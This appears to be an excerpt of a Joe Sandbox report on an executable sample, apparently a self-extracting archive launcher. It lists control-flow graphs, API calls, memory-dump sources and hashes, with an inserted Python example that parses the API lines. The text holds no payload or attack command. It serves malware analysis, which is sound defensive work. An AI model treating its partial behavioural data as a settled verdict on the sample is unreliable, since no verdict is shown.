9fd9b4-9fd9b8 701->708 702->688 707->688 708->680 709 9fd9ba-9fd9bc 708->709 709->688 715 9fd6f9-9fd6fd 713->715 714->713 719 9fd6ec-9fd6f4 714->719 715->675 720 9fd6ff-9fd706 715->720 719->715 722 9fd7be-9fd7c1 720->722 723 9fd70c-9fd71a call 9ffdfb 720->723 753 9fd93e-9fd947 721->753 754 9fd94a-9fd95f 721->754 722->668 727 9fd7c7-9fd7ce 722->727 728 9fd71f 723->728 730 9fd7d6-9fd7d7 727->730 731 9fd7d0-9fd7d4 727->731 728->677 730->727 731->730 733 9fd7d9-9fd7e7 731->733 734 9fd7e9-9fd7ec 733->734 735 9fd808-9fd830 call a01596 733->735 737 9fd7ee-9fd803 734->737 738 9fd805 734->738 743 9fd853-9fd85b 735->743 744 9fd832-9fd84e call a135e9 735->744 737->734 737->738 738->735 748 9fd85d 743->748 749 9fd862-9fd87b call 9fdd6b 743->749 744->728 748->749 749->728 753->754 756 9fd960-9fd967 754->756 757 9fd969-9fd96d 756->757 758 9fd973-9fd974 756->758 757->728 757->758 758->756
                  APIs
                  • __EH_prolog.LIBCMT ref: 009FD346
                  • _wcschr.LIBVCRUNTIME ref: 009FD367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,009FD328,?), ref: 009FD382
                  • __fprintf_l.LIBCMT ref: 009FD873
                    • Part of subcall function 00A0137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009FB652,00000000,?,?,?,0001042A), ref: 00A01396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-980926923
                  • Opcode ID: d9100b006c1e48611f50050a07f5030fc845b9319f2fa5a8693f2fb152bcb9de
                  • Instruction ID: 8e3c511e957956f934e09d9bc5f4af95df25fbd539cb7e6070de57e58c4e5455
                  • Opcode Fuzzy Hash: d9100b006c1e48611f50050a07f5030fc845b9319f2fa5a8693f2fb152bcb9de
                  • Instruction Fuzzy Hash: 8712CFB190121D9ADF24EFA4DC81BFEB7BAEF45714F104569F605A7191EB709A80CB20

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A0AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                    • Part of subcall function 00A0AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                    • Part of subcall function 00A0AC74: IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                    • Part of subcall function 00A0AC74: TranslateMessage.USER32(?), ref: 00A0ACB8
                    • Part of subcall function 00A0AC74: DispatchMessageW.USER32(?), ref: 00A0ACC2
                  • GetDlgItem.USER32(00000068,00A4ECB0), ref: 00A0CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00A0A632,00000001,?,?,00A0AECB,00A24F88,00A4ECB0), ref: 00A0CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A0CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,00A235B4), ref: 00A0CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A0CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A0CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,00A2431C), ref: 00A0CC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: 1ff56095e830613772937846e49422ff065884282c5e72421d0cf2c1f3f384b8
                  • Instruction ID: 7143269823ff4e22903036caa149f43283d05233ef1eedfdf41c43c3031c15e7
                  • Opcode Fuzzy Hash: 1ff56095e830613772937846e49422ff065884282c5e72421d0cf2c1f3f384b8
                  • Instruction Fuzzy Hash: 9E31DE72186745ABE301DF60EC4AFAB7EACFB82725F000608F651961D1DB64590AC7B6
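The "APIs" lists in these function records share one line format: `Api.MODULE(arg,arg,...), ref: address`, with a `Part of subcall function X:` prefix when the call is reached through a callee and `?` for arguments the plugin could not resolve. The following Python is an added example, not part of the Joe Sandbox report, that parses such lines into structured records and decodes the message identifiers of the SendMessageW calls listed above (0xB1 EM_SETSEL, 0xC2 EM_REPLACESEL, 0x143 CB_ADDSTRING, 0x43A EM_GETCHARFORMAT, 0x444 EM_SETCHARFORMAT). The sample lines are copied from the records on this page; the message table is deliberately limited to the identifiers that occur here, and `env_vars_set` is a small triage helper of this example, not something the report provides.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record into structured calls."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied from the API lists in the records above.
SAMPLE_APIS = """\
• __EH_prolog.LIBCMT ref: 00A0BDFA
  • Part of subcall function 00A0AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A0AAFE
• SetWindowTextW.USER32(?,?), ref: 00A0C127
• GetDlgItem.USER32(?,00000066), ref: 00A0C2EC
• SendMessageW.USER32(00000000,00000143,00000000,00A3A472), ref: 00A0C30A
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0CBC5
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0CC23
• SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0D2D9
"""

# Bullet, optional "Part of subcall function X:" prefix, Api.MODULE, optional
# "(args)," and the call-site reference. Lines without parentheses (CRT
# helpers such as __EH_prolog) have no comma before "ref:".
LINE_RE = re.compile(
    r"^\s*[•]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Message identifiers seen in the SendMessageW calls of this report only.
WINDOW_MESSAGES = {
    0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL", 0x0143: "CB_ADDSTRING",
    0x043A: "EM_GETCHARFORMAT", 0x0444: "EM_SETCHARFORMAT",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]               # raw tokens as printed; '?' means unresolved
    ref: int                      # call-site address inside the dump
    subcall_of: Optional[int]     # function address when reached via a callee


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the API lines of one record into ApiCall objects, skipping headings."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # 'APIs', 'Strings' and similar headings are not calls
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


def arg_int(tok: str) -> Optional[int]:
    """Hex token (optionally negative) to int; '?' and symbolic tokens give None.
    A purely alphabetic hex-looking string such as 'ABCDEF' is accepted as hex."""
    digits = tok[1:] if tok.startswith("-") else tok
    if not re.fullmatch(r"[0-9A-Fa-f]+", digits):
        return None
    value = int(digits, 16)
    return -value if tok.startswith("-") else value


def describe(call: ApiCall) -> str:
    """One readable line per call; SendMessageW gets its message id decoded."""
    if call.api == "SendMessageW" and len(call.args) >= 4:
        msg = arg_int(call.args[1])
        name = WINDOW_MESSAGES.get(msg, f"0x{msg:04X}" if msg is not None else "?")
        return f"{call.ref:08X} SendMessageW({name}, wParam={call.args[2]}, lParam={call.args[3]})"
    return f"{call.ref:08X} {call.api}({', '.join(call.args)})"


def env_vars_set(calls: List[ApiCall]) -> List[str]:
    """Names written through SetEnvironmentVariableW, in call order."""
    return [c.args[0] for c in calls if c.api == "SetEnvironmentVariableW" and c.args]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    for c in parsed:
        print(describe(c))
    print("environment variables set:", env_vars_set(parsed))
```

Running the block prints each call with its call-site address, which is the form in which the calls are easiest to cross-reference against the `ref:` addresses of the disassembly and against the `Executed`/`Not Executed` basic blocks of the graphs.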

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 796 a0ce22-a0ce3a call a0e360 799 a0ce40-a0ce4c call a135b3 796->799 800 a0d08b-a0d093 796->800 799->800 803 a0ce52-a0ce7a call a0f350 799->803 806 a0ce84-a0ce91 803->806 807 a0ce7c 803->807 808 a0ce93 806->808 809 a0ce95-a0ce9e 806->809 807->806 808->809 810 a0cea0-a0cea2 809->810 811 a0ced6 809->811 812 a0ceaa-a0cead 810->812 813 a0ceda-a0cedd 811->813 814 a0ceb3-a0cebb 812->814 815 a0d03c-a0d041 812->815 816 a0cee4-a0cee6 813->816 817 a0cedf-a0cee2 813->817 818 a0cec1-a0cec7 814->818 819 a0d055-a0d05d 814->819 820 a0d043 815->820 821 a0d036-a0d03a 815->821 822 a0cef9-a0cf0e call 9fb493 816->822 823 a0cee8-a0ceef 816->823 817->816 817->822 818->819 824 a0cecd-a0ced4 818->824 826 a0d065-a0d06d 819->826 827 a0d05f-a0d061 819->827 825 a0d048-a0d04c 820->825 821->815 821->825 831 a0cf10-a0cf1d call a017ac 822->831 832 a0cf27-a0cf32 call 9fa180 822->832 823->822 828 a0cef1 823->828 824->811 824->812 825->819 826->813 827->826 828->822 831->832 837 a0cf1f 831->837 838 a0cf34-a0cf4b call 9fb239 832->838 839 a0cf4f-a0cf5c ShellExecuteExW 832->839 837->832 838->839 841 a0cf62-a0cf6f 839->841 842 a0d08a 839->842 844 a0cf71-a0cf78 841->844 845 a0cf82-a0cf84 841->845 842->800 844->845 846 a0cf7a-a0cf80 844->846 847 a0cf86-a0cf8f 845->847 848 a0cf9b-a0cfba call a0d2e6 845->848 846->845 849 a0cff1-a0cffd CloseHandle 846->849 847->848 856 a0cf91-a0cf99 ShowWindow 847->856 848->849 864 a0cfbc-a0cfc4 848->864 851 a0d00e-a0d01c 849->851 852 a0cfff-a0d00c call a017ac 849->852 854 a0d079-a0d07b 851->854 855 a0d01e-a0d020 851->855 852->851 866 a0d072 852->866 854->842 861 a0d07d-a0d07f 854->861 855->854 859 a0d022-a0d028 855->859 856->848 859->854 863 a0d02a-a0d034 859->863 861->842 865 a0d081-a0d084 ShowWindow 861->865 863->854 864->849 867 a0cfc6-a0cfd7 GetExitCodeProcess 864->867 865->842 866->854 867->849 868 a0cfd9-a0cfe3 867->868 869 a0cfe5 868->869 870 a0cfea 868->870 869->870 870->849
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 00A0CF54
                  • ShowWindow.USER32(?,00000000), ref: 00A0CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00A0CFCF
                  • CloseHandle.KERNEL32(?), ref: 00A0CFF5
                  • ShowWindow.USER32(?,00000001), ref: 00A0D084
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 35de1399d527b9129f6728054feda324d5876388c59fe744ab13a7e7744dad7b
                  • Instruction ID: a575cc0728bc4d22290ab7ffabd6a5ace4f342477c760796523159c46326eb29
                  • Opcode Fuzzy Hash: 35de1399d527b9129f6728054feda324d5876388c59fe744ab13a7e7744dad7b
                  • Instruction Fuzzy Hash: DB61F471504389AADB31DFA4F8406ABBBF9BF81310F044919F5C6972D1D7B18986CB92

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 871 a1a058-a1a071 872 a1a073-a1a083 call a1e6ed 871->872 873 a1a087-a1a08c 871->873 872->873 883 a1a085 872->883 874 a1a099-a1a0bd MultiByteToWideChar 873->874 875 a1a08e-a1a096 873->875 877 a1a250-a1a263 call a0ec4a 874->877 878 a1a0c3-a1a0cf 874->878 875->874 880 a1a0d1-a1a0e2 878->880 881 a1a123 878->881 884 a1a101-a1a112 call a18518 880->884 885 a1a0e4-a1a0f3 call a21a30 880->885 887 a1a125-a1a127 881->887 883->873 888 a1a245 884->888 899 a1a118 884->899 885->888 898 a1a0f9-a1a0ff 885->898 887->888 889 a1a12d-a1a140 MultiByteToWideChar 887->889 893 a1a247-a1a24e call a1a2c0 888->893 889->888 892 a1a146-a1a158 call a1a72c 889->892 900 a1a15d-a1a161 892->900 893->877 902 a1a11e-a1a121 898->902 899->902 900->888 903 a1a167-a1a16e 900->903 902->887 904 a1a170-a1a175 903->904 905 a1a1a8-a1a1b4 903->905 904->893 906 a1a17b-a1a17d 904->906 907 a1a200 905->907 908 a1a1b6-a1a1c7 905->908 906->888 909 a1a183-a1a19d call a1a72c 906->909 910 a1a202-a1a204 907->910 911 a1a1e2-a1a1f3 call a18518 908->911 912 a1a1c9-a1a1d8 call a21a30 908->912 909->893 926 a1a1a3 909->926 915 a1a206-a1a21f call a1a72c 910->915 916 a1a23e-a1a244 call a1a2c0 910->916 911->916 925 a1a1f5 911->925 912->916 924 a1a1da-a1a1e0 912->924 915->916 929 a1a221-a1a228 915->929 916->888 928 a1a1fb-a1a1fe 924->928 925->928 926->888 928->910 930 a1a264-a1a26a 929->930 931 a1a22a-a1a22b 929->931 932 a1a22c-a1a23c WideCharToMultiByte 930->932 931->932 932->916 933 a1a26c-a1a273 call a1a2c0 932->933 933->893
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A14E35,00A14E35,?,?,?,00A1A2A9,00000001,00000001,3FE85006), ref: 00A1A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A1A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00A1A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A1A232
                  • __freea.LIBCMT ref: 00A1A23F
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • __freea.LIBCMT ref: 00A1A248
                  • __freea.LIBCMT ref: 00A1A26D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 8789f2cc0864f9c64454791fdabd9a2ace282890f5d10fd437f254fc675e75c1
                  • Instruction ID: 8c5ed482fd2198356bf339616d6025e87ad0969c7e4227f187f61a0175d995a7
                  • Opcode Fuzzy Hash: 8789f2cc0864f9c64454791fdabd9a2ace282890f5d10fd437f254fc675e75c1
                  • Instruction Fuzzy Hash: 1B51D172612216AFEB258F74CD41EFB77AAEB64760F144229FC05D6150EB35DCC0C6A2

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • OleInitialize.OLE32(00000000), ref: 00A0A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A0A385
                  • SHGetMalloc.SHELL32(00A38430), ref: 00A0A38F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3To
                  • API String ID: 3498096277-2168385784
                  • Opcode ID: 0850c3ce64d1f98aa489d3389e9e50d4a63f3eacc8758ba68c96545bda09815e
                  • Instruction ID: 63d17c6d7db2b4260bb696d55564d6e5904f44593a26834f10cc09712a551fa3
                  • Opcode Fuzzy Hash: 0850c3ce64d1f98aa489d3389e9e50d4a63f3eacc8758ba68c96545bda09815e
                  • Instruction Fuzzy Hash: 41F0ECB190020DABCB10EF999949AEFFBFCFB95701F00455AF854A2240DBB456058BA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 940 9f99b0-9f99d1 call a0e360 943 9f99dc 940->943 944 9f99d3-9f99d6 940->944 946 9f99de-9f99fb 943->946 944->943 945 9f99d8-9f99da 944->945 945->946 947 9f99fd 946->947 948 9f9a03-9f9a0d 946->948 947->948 949 9f9a0f 948->949 950 9f9a12-9f9a31 call 9f70bf 948->950 949->950 953 9f9a39-9f9a57 CreateFileW 950->953 954 9f9a33 950->954 955 9f9abb-9f9ac0 953->955 956 9f9a59-9f9a7b GetLastError call 9fb66c 953->956 954->953 958 9f9ac2-9f9ac5 955->958 959 9f9ae1-9f9af5 955->959 965 9f9a7d-9f9a9f CreateFileW GetLastError 956->965 966 9f9aaa-9f9aaf 956->966 958->959 963 9f9ac7-9f9adb SetFileTime 958->963 960 9f9af7-9f9b0f call 9ffe56 959->960 961 9f9b13-9f9b1e 959->961 960->961 963->959 968 9f9aa5-9f9aa8 965->968 969 9f9aa1 965->969 966->955 970 9f9ab1 966->970 968->955 968->966 969->968 970->955
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,009F78AD,?,00000005,?,00000011), ref: 009F9A4C
                  • GetLastError.KERNEL32(?,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,009F78AD,?,00000005,?), ref: 009F9A8E
                  • GetLastError.KERNEL32(?,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: 15e583712bfbe0fc4e7d68f75b3d6ee8bd104705f1556bd5d4452bb90ffeedba
                  • Instruction ID: 4cf1de0920bfbbba7b1d0eac894fd7b1cbeaa51726b03d1da13fc64238de1cd2
                  • Opcode Fuzzy Hash: 15e583712bfbe0fc4e7d68f75b3d6ee8bd104705f1556bd5d4452bb90ffeedba
                  • Instruction Fuzzy Hash: E54144315487496FE730DB64CC05BEABBD8BB01324F100719F6E4961D0E7B9A989CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 999 a0ac74-a0ac8d PeekMessageW 1000 a0acc8-a0accc 999->1000 1001 a0ac8f-a0aca3 GetMessageW 999->1001 1002 a0acb4-a0acc2 TranslateMessage DispatchMessageW 1001->1002 1003 a0aca5-a0acb2 IsDialogMessageW 1001->1003 1002->1000 1003->1000 1003->1002
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                  • IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                  • TranslateMessage.USER32(?), ref: 00A0ACB8
                  • DispatchMessageW.USER32(?), ref: 00A0ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: b6e2c85c77201485b6c74e450f9edd45b2062a213c078ca93e41f29d2de5608e
                  • Instruction ID: b2fcffe075350c10268344b6660a5d234a2fd2bfb4cac524c79ce406b9d1d7eb
                  • Opcode Fuzzy Hash: b6e2c85c77201485b6c74e450f9edd45b2062a213c078ca93e41f29d2de5608e
                  • Instruction Fuzzy Hash: D5F0BD7290232DABDB20DBE6AC4CEEB7F6CFE162527404415F515D2190EB28D906C7B1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1004 a0a2c7-a0a2e6 GetClassNameW 1005 a0a2e8-a0a2fd call a017ac 1004->1005 1006 a0a30e-a0a310 1004->1006 1011 a0a30d 1005->1011 1012 a0a2ff-a0a30b FindWindowExW 1005->1012 1007 a0a312-a0a315 SHAutoComplete 1006->1007 1008 a0a31b-a0a31f 1006->1008 1007->1008 1011->1006 1012->1011
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 00A0A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A0A315
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A0A305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: EDIT
                  • API String ID: 4243998846-3080729518
                  • Opcode ID: 1281685d19319ec322d50af37323ad6f6444f897b15f1ead59b148388763ddd4
                  • Instruction ID: 53fdaa5066b53333a87eafd43cd48d57d8472fd1ab53839291f63eca41445db9
                  • Opcode Fuzzy Hash: 1281685d19319ec322d50af37323ad6f6444f897b15f1ead59b148388763ddd4
                  • Instruction Fuzzy Hash: B8F08236B4232C77E72097A4BC05FEB776CAB46B11F440066BD05A61C0D7609D42C6F7

                  Control-flow Graph
                  • Nodes: 1013 a0d287-a0d2bb call a0e360 SetEnvironmentVariableW call 9ffbd8; 1018 a0d2bd-a0d2c1; 1019 a0d2df-a0d2e3; 1020 a0d2ca-a0d2d1 call 9ffcf1; 1023 a0d2c3-a0d2c9; 1024 a0d2d3-a0d2d9 SetEnvironmentVariableW
                  • Edges: 1013->1018, 1013->1019, 1018->1020, 1020->1023, 1020->1024, 1023->1020, 1024->1019
                  APIs
                  • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A0D29D
                  • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0D2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
